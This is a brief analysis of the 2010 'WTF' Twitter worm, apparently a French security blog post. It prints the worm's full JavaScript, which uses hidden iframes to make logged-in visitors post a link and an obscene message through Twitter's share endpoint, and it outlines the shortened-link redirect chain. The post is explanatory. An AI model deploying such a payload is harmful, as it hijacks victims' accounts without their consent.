/* Quick analysis of the WTF Twitter worm Analysis by Chae Jong Bin (http://twitter.com/2gg) */ // WTF Twitter worm's tweet WTF: hxxp://t.co/5Hfpkqu // Source code of 1b7xk3b.html < script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "hxxp://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "hxxp://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); < /script> // Control flow (After you click link) 1) Navigate to hxxp://t.co/5Hfpkqu 2) Redirected to hxxp://pastehtml.com/view/1b7xk3b.html 3) Execute JavaScript (Twitter status update)
Analyse rapide du ver Twitter WTF
jeudi 30 septembre 2010. Lien permanent hacking / piratage
Une démonstration du risque engendré par les URL raccourcies, mise en pratique par le ver Twitter WTF qui inscrivait sur votre compte Twitter "i love anal sex with goats" .
Toute personne cliquant sur le lien se trouvait redirigée sur une page en html contenant un code malicieux qui mettait à jour le status des victimes connectées à leur compte Twitter.
Derniers commentaires